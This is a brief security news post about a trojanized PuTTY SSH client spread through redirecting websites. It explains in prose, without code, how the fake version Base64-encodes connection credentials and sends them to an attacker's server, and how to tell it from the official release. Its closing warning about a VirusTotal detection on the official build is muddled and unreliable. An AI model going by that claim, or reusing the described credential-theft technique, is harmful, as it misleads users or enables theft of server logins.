Putty holds important place in system administrator’s toolkit as it allows encrypted connection to remote servers. But today Putty ssh client injected with trojan appeared in the wild. Cyber criminals modified official putty ssh source code by inserting malicious algorithm and redirected users from compromised website to their own.
How does malicious PuTTy SSH work?
PuTTy ssh is an open source product, allowing any user to help authors improve project and fix bugs. This also makes possible to malicious users get have access to source code modification and use it at their own will. PuTTY uses SSH (Secure Shell) for sending data and this data in most cases is very sensitive like passwords and user names. Such sensitive information can be used for gaining root or highest privileges on remote devices.
According to Symantec the malicious file has been around since late 2013 and it was first captured by Virus Total in same year. But cyber criminals started large distribution only recently.
The distribution takes place in following order:
- Victim searches for Putty in search engine
- While search engine provides many results, user unknowingly chooses an unofficial website thus avoiding official clean version located at http://www.chiark.greenend.org.uk/~sgtatham/putty/
- After accessing the link victim is redirected to multiple IP addresses until it connects to an IP located in UAE, providing with trojanized version.
How to differentiate official release from unofficial?
- Unofficial release is larger then official Putty ssh
- Official version uses standard SSH URL format:
- “ssh://[USER NAME]:[PASSWORD]@[HOST NAME]:[PORT NUMBER]”
- Unofficial one copies connection URL, encodes it with Base64 and pings attackers server.
Warning: We at Security Zap decided to scan official Putty with Virus Total and detected that it might be infected with Trojan.Win32.Classic.drtngk, however this doesn’t definitely mean that official release is not safe to use. Download PuTTy SSH only from: http://www.chiark.greenend.org.uk/~sgtatham/putty/